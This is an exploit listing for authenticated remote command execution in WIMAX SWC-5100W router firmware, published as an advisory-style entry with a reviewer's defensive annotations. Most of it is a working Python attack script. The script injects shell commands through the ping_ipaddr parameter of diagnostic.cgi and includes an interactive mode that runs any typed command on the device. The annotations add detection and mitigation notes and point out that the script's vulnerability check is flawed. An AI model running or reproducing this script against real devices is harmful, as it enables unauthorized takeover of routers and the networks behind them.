WIMAX SWC-5100W Remote Command Execution

2023.04.06
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration
#
# Reviewer notes (defensive reading of this listing):
# - Weakness class per the advisory header: CWE-78 (OS command injection). Every
#   request below targets /cgi-bin/diagnostic.cgi and places shell metacharacters
#   (`;` and backticks) in the `ping_ipaddr` query parameter of the ping diagnostic.
# - The title says "Authenticated", yet none of the requests in this listing sends
#   credentials, a cookie or a session token. Whether the endpoint enforces a login
#   cannot be determined from this page -- TODO confirm on an affected unit.
# - All traffic is plain HTTP GET with no timeout set on the requests calls.
# - Detection: log or alert on requests to diagnostic.cgi whose `ping_ipaddr` value
#   is not a bare IP address or hostname (contains `;`, a backtick, or `echo`).
# - Mitigation: the page names no fixed firmware version; until one is confirmed,
#   keep the router's web management interface unreachable from untrusted networks.
#   Firmware-side, the parameter should be validated as an address before use.
# - This listing was flattened onto two lines by the page extraction; the layout
#   below is a reconstruction and string literals are kept exactly as shown there.

import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup

# Terminal colour codes used for status output.
red = Fore.RED
green = Fore.GREEN
cyan = Fore.CYAN
yellow = Fore.YELLOW
reset = Fore.RESET

# Command-line interface: a target host plus one of two mode switches.
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true')
argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true')
args = argParser.parse_args()

# Module-level globals read by the functions below.
target = args.target
rev = args.reverseShell
testX = args.testExploit

# ASCII-art banner. Its original line breaks were lost when the page was
# flattened, so it is kept on one line exactly as the page shows it.
# NOTE(review): `\|` is not a recognised escape in a non-raw string; recent
# Python versions emit a warning for it.
banner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a || ||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\| RCE 0day in WIMAX SWC-5100W [ Spell the CGI as in Cyber Guy ] """


def checkEXP():
    """Probe the global `target` and print whether it looks vulnerable.

    Sends one GET to diagnostic.cgi whose `ping_ipaddr` value carries an
    `echo` of one of two marker strings, then inspects the response text.

    NOTE(review): the "Target is vulnerable" verdict is not reliable
    evidence. `str.find` returns -1 when the text is absent, and -1 is
    truthy, so the condition below is true whenever the first marker is
    missing or the second marker is missing or sits at a non-zero offset.
    In practice almost any HTTP 200 response is reported as vulnerable.
    Treat only the output of the second request (the `pwned` element) as
    an indication that the command was executed.
    """
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    # Marker strings; one is chosen at random and echoed through the parameter.
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None)
    if request.status_code == 200:
        print(green + "[+] Status code: 200 success" + reset)
        soup = BeautifulSoup(request.text, 'html.parser')
        # See the docstring: this test does not actually require a marker to be present.
        if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"):
            print(green + "[+] Target is vulnerable" + reset)
            # Second request: wraps the output of three commands in an <a id='pwned'>
            # element so it can be located in the returned HTML.
            uname = requests.get(url = 
                f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";")
            soup_validate = BeautifulSoup(uname.text, 'html.parser')
            # find() returns None when the element is absent, in which case `.text`
            # raises AttributeError here.
            print(soup_validate.find(id="pwned").text)
        else:
            print(red + "[+] Seems to be not vulnerable" + reset)
    else:
        print(red + "[+] Status code: " + str(request.status_code) + reset)


def revShell():
    """Prompt for a command, send it to the global `target`, print the reply.

    Despite the name and the `-rv` help text, no reverse connection is set
    up: each command travels in its own HTTP GET to diagnostic.cgi and the
    output is read back from the response body. For defenders this means
    the activity shows up as a series of inbound web requests to the
    device rather than as an outbound connection from it.

    NOTE(review): the `while` body always returns or exits, so it behaves
    like an `if`; the prompt repeats through recursion, one stack frame per
    command. Empty input ends the function. "exit"/"quit" are compared only
    after the request has already been sent.
    """
    cmd = input("CGI #:- ")
    while cmd:
        try:
            print(cmd)
            # The typed text is interpolated into the URL unescaped, inside backticks.
            uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";")
            resp = BeautifulSoup(uname.text, 'html.parser')
            # find() returns None when no `result` element came back; `.text` then raises.
            print(resp.find(id="result").text)
            if cmd == "exit" or cmd == "quit":
                print(yellow + "[*] Terminating ..." + reset)
                sys.exit(0)
            else:
                return revShell()
        except KeyboardInterrupt:
            sys.exit(0)


def help():
    """Print a usage summary.

    NOTE(review): nothing in this listing calls this function (the fallback
    branch uses argParser.print_help() instead), it shadows the builtin
    `help`, and the `-fz/--fuzz` option it lists is not registered with
    argParser above.
    """
    print( """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv [*] -t, --target :: Specify target to attack. [*] -rv, --reverseShell :: Obtain reverse shell. [*] -tx, --testExploit :: Test the exploitability of the target. [*] -fz, --fuzz :: Fuzz the target with arbitrary chars. """ )


# Mode dispatch: `-rv` takes precedence over `-tx`; with no target or no mode
# switch the script only prints the banner and the argparse usage text.
if target and rev:
    print(banner)
    revShell()
elif target and testX:
    print(banner)
    checkEXP()
else:
    print(banner)
    argParser.print_help()

